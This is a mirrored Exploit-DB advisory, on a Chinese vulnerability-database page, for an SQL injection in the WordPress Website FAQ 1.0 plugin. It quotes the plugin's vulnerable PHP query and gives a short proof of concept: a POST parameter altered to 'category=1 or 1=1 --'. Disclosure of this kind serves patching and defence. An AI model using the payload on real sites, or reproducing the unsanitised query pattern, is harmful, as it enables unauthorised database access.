https://www.exploit-db.com/exploits/19400
WordPress Plugin Website FAQ 1.0 - SQL Injection
| 漏洞ID | 1063916 | 漏洞类型 | |
| 发布时间 | 2012-06-26 | 更新时间 | 2012-06-26 |
 CVE编号
|
N/A |  CNNVD-ID
|
N/A |
| 漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection
# Date: 6/25/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/
# Software Link: http://downloads.wordpress.org/plugin/website-faq.zip
# Version: 1.0
==============================================================================
Vulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php
==============================================================================
Lines 106-115:
function displayAnswer()
{
global $wpdb;
$master_table = $wpdb->prefix . "faq";
$category = $_POST['category'];
$searchtxt = $_POST['searchtxt'];
if($category!=0)
{
$sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND faq_question LIKE '%".$searchtxt."%'";
}
===============================================================
Vulnerability Details: faq_category vulnerable to SQL injection
===============================================================
When submitting a query via the widget, intercept the post request via burp or other proxy to find the following:
action=displayAnswer&category=1&searchtxt=[your query]
Changing category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of searchtxt value.检索漏洞
开始时间
结束时间